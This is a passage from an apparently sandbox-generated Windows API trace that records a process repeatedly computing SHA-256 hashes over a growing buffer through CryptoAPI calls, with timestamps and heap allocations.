hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bc40 [0147.993] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5bc40, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bc40, pdwDataLen=0xceaec) returned 1 [0147.993] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.993] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0147.993] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.994] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.994] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0147.994] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.994] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b760 [0147.994] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5b760, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b760, pdwDataLen=0xceaec) returned 1 [0147.994] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.994] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.994] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.994] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.994] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0147.994] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.994] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b6a0 [0147.994] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b6a0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b6a0, pdwDataLen=0xceaec) returned 1 [0147.994] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.994] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.994] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.995] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.995] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0147.995] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.995] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b340 [0147.995] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b340, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b340, pdwDataLen=0xceaec) returned 1 [0147.995] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.995] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.995] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0147.996] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.996] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0147.996] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.996] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b460 [0147.996] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b460, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b460, pdwDataLen=0xceaec) returned 1 [0147.996] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.996] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0147.996] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0147.997] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.997] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0147.997] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b790 [0147.997] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5b790, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b790, pdwDataLen=0xceaec) returned 1 [0147.997] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.997] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0147.997] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.997] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.997] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0147.997] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b8e0 [0147.997] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5b8e0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b8e0, pdwDataLen=0xceaec) returned 1 [0147.998] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.998] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.998] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0147.999] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.999] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0147.999] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b370 [0147.999] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b370, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b370, pdwDataLen=0xceaec) returned 1 [0147.999] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.999] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0147.999] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0147.999] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.999] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0147.999] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b820 [0148.000] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5b820, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b820, pdwDataLen=0xceaec) returned 1 [0148.000] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.000] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0148.000] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0148.000] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.000] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0148.000] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.000] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bee0 [0148.000] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bee0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bee0, pdwDataLen=0xceaec) returned 1 [0148.000] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.000] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0148.000] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.001] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.001] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0148.001] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bbb0 [0148.001] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e5bbb0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bbb0, pdwDataLen=0xceaec) returned 1 [0148.001] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0148.001] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.001] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0148.002] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.002] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0148.002] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bd90 [0148.002] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bd90, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bd90, pdwDataLen=0xceaec) returned 1 [0148.002] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.002] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0148.002] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.002] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.002] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0148.002] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b9a0 [0148.002] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b9a0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b9a0, pdwDataLen=0xceaec) returned 1 [0148.002] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.002] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.003] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.003] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.003] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0148.003] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.003] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b4f0 [0148.003] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b4f0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b4f0, pdwDataLen=0xceaec) returned 1 [0148.003] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.003] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.003] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0148.004] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.004] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0148.004] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.004] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bc10 [0148.004] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bc10, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bc10, pdwDataLen=0xceaec) returned 1 [0148.004] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.004] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0148.004] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0148.004] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.004] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0148.004] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.005] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b520 [0148.005] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b520, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b520, pdwDataLen=0xceaec) returned 1 [0148.005] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.005] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0148.005] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.005] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.005] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0148.005] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.005] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bdc0 [0148.005] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5bdc0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bdc0, pdwDataLen=0xceaec) returned 1 [0148.005] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.005] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.005] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.006] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.006] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0148.006] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.006] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b430 [0148.006] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b430, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b430, pdwDataLen=0xceaec) returned 1 [0148.006] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.006] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.006] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.007] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.007] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0148.007] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b490 [0148.007] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x2, pbData=0x32e5b490, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b490, pdwDataLen=0xceaec) returned 1 [0148.007] CryptDestroyHash (hHash=0x332b7890) returned 1 [0148.007] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.007] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.007] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.007] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0148.007] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.008] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ba60 [0148.008] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e5ba60, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ba60, pdwDataLen=0xceaec) returned 1 [0148.008] CryptDestroyHash (hHash=0x332b7900) returned 1 [0148.008] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.008] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0148.008] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.008] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0148.008] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.008] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bcd0 [0148.008] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bcd0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bcd0, pdwDataLen=0xceaec) returned 1 [0148.008] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.008] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0148.008] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.009] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.009] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0148.009] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.009] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bd00 [0148.009] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bd00, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bd00, pdwDataLen=0xceaec) returned 1 [0148.009] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.009] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.009] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0148.010] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.010] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0148.010] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5be80 [0148.010] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5be80, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5be80, pdwDataLen=0xceaec) returned 1 [0148.010] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.010] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0148.010] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.010] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.010] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0148.010] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.010] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bb50 [0148.011] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5bb50, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5bb50, pdwDataLen=0xceaec) returned 1 [0148.011] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.011] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.011] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.011] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.011] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0148.011] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.011] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b4c0 [0148.011] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b4c0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b4c0, pdwDataLen=0xceaec) returned 1 [0148.011] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.011] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.011] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.012] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.012] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0148.012] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0148.012] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b310 [0148.012] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.012] CryptReleaseContext (hProv=0x338229d0, 